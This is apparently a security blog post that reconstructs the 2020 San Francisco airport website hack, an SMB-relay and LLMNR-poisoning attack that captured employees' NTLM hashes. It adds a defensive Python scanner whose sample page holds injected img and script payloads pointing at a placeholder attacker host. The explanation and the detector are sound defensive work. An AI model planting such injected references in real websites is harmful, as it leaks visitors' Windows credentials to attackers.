Breaking down the San Francisco airport hack

Blog | 06-05-2020 | 2 Minute read


On April 7, 2020, the San Francisco International Airport (SFO) released a notice confirming that two of its websites, and, were targets of a cyberattack in March 2020. The attack has been attributed to a hacker group that was attempting to steal the Windows logins of the airport’s employees.

When we hear news about cyberattacks, a few typical, yet crucial questions spring to mind: How did the attackers perform the cyberattack? Why did the airport authorities take so long to discover the breach? Could the breach have been prevented? And most importantly, am I at risk too?

The attack involved the Server Message Block (SMB) protocol, a client-server protocol used for sharing access to files, printers, and serial ports over a network. To gain a deeper understanding and examine the possible reasons behind the breach, we took on the mammoth task of simulating the attack on our end.


After compromising the SFO employee sites, the attackers injected a small piece of JavaScript code into the website.

[Image 1: the injected code, with the src attribute highlighted]

If you look at the highlighted region in the image above, you will notice that the src (source) attribute points to an image on a remote system via a file:// path. As you have probably already realized, the code inserts an image element into the website's HTML, and the browser fetches that image when the page loads.


We now need to set up the attacker's system, that is, the remote system from which the injected code tries to fetch the image. This system does not need to be joined to the domain.

Next, a network sniffer, a tool that captures and answers requests arriving from other hosts, must be installed on that system.

[Image 2: the PowerShell LLMNR poisoning script]

The image above shows a publicly available PowerShell script that poisons (answers) all Link-Local Multicast Name Resolution (LLMNR) requests it sees on the network.

We will examine LLMNR in detail in future blog posts; for now, all you need to know is that LLMNR acts as a fallback to DNS: when DNS cannot resolve a hostname, Windows multicasts the query to the local network segment, and any host on that segment can answer it. That is what the script above takes advantage of. Below is a visual representation of the attack.

[Image 3: diagram of the attack]

The diagram above is an example of an SMB-relay attack.


  • \\Serv1 in the diagram is the UNC location of the PNG file injected into the website.
  • The victim user's browser attempts to load the image from its UNC path (FILE://) on the attacker's system, which means opening an SMB connection to that system.
  • Thanks to the network sniffer running there, the attackers capture the NTLM hashes that the victim's machine sends while trying to authenticate to the share.
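As an added defensive example (not code from the original post), the following Python scanner flags HTML content whose resource references would make a Windows browser reach out over SMB, i.e. the injected `<img>` or script described above. The sample page and the ATTACKER-HOST name are constructed placeholders, not values from the incident.

```python
import re
from html.parser import HTMLParser

# Attributes whose value a browser fetches automatically when the page renders.
FETCH_ATTRS = {"src", "href", "data", "poster", "background"}
# A file: URL or a bare UNC path (\\host\share) makes Windows open an SMB session
# to that host. Protocol-relative "//cdn..." URLs are plain HTTP(S) and are not matched.
ATTR_SMB_REF = re.compile(r"^\s*(file:|\\\\)", re.IGNORECASE)
# Inside inline script text, look for file:// or an escaped UNC prefix (\\\\).
SCRIPT_SMB_REF = re.compile(r"file:\s*//|\\\\", re.IGNORECASE)

class SmbRefScanner(HTMLParser):
    """Record every element or inline script that would pull a resource over SMB."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, attribute or 'inline', value)
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        for name, value in attrs:  # html.parser lower-cases tag and attribute names
            if value and name in FETCH_ATTRS and ATTR_SMB_REF.match(value):
                self.findings.append((tag, name, value.strip()))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here verbatim (CDATA mode), so scan their source text.
        if self._in_script and SCRIPT_SMB_REF.search(data):
            self.findings.append(("script", "inline", " ".join(data.split())))

def find_smb_references(html):
    """Return (tag, attribute, value) findings for every SMB-bound reference in html."""
    scanner = SmbRefScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample page: two benign references, then an injected <img> and an
# injected script of the kind described above. ATTACKER-HOST is a placeholder.
SAMPLE_HTML = r"""<html><body>
<img src="/static/logo.png" alt="logo">
<script src="//cdn.example.test/app.js"></script>
<img src="file://ATTACKER-HOST/share/pixel.png" width="1" height="1">
<script>var i = new Image(); i.src = "\\\\ATTACKER-HOST\\share\\pixel.png";</script>
</body></html>"""
```

Calling `find_smb_references(SAMPLE_HTML)` reports the injected `<img>` and the inline script and nothing else, which makes it usable as a content check for published pages or as a web-proxy rule.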


The prospect of being on the receiving end of one of these attacks is scary, but there are ways to prevent them.

NOTE: The attack outlined above follows a similar concept to the San Francisco International Airport breach, but the actual tools and attack method used there may differ.
